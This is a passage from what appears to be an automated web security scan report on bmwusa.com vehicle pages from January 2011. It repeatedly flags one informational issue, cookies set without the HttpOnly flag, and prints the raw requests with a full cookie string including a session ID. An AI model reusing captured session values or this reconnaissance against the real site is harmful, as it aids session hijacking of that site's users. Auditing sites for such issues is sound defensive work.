<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.231. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:26:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:46:20 GMT;path=/
Content-Length: 215070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.232. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:37 GMT;path=/
Content-Length: 225949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.233. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:27:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:47:15 GMT;path=/
Content-Length: 216307


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.234. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:59 GMT;path=/
Content-Length: 202183


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.235. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:38 GMT;path=/
Content-Length: 215063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.236. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:12 GMT;path=/
Content-Length: 226227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.237. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:45 GMT;path=/
Content-Length: 216433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.238. http://www.bmwusa.com/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/3convertibleexplorenew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/3convertibleexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:54 GMT;path=/
Content-Length: 180296


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.239. http://www.bmwusa.com/standard/content/vehicles/2011/3/3coupeexplorenew.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/3coupeexplorenew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/3coupeexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:21 GMT;path=/
Content-Length: 180154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.240. http://www.bmwusa.com/standard/content/vehicles/2011/3/3sedanexplore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/3sedanexplore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/3sedanexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:41 GMT;path=/
Content-Length: 179241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.241. http://www.bmwusa.com/standard/content/vehicles/2011/3/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:40 GMT;path=/
Content-Length: 210063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.242. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:02:35 GMT;path=/
Content-Length: 201964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.243. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:40:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:00:40 GMT;path=/
Content-Length: 202153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.244. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:51 GMT;path=/
Content-Length: 213820


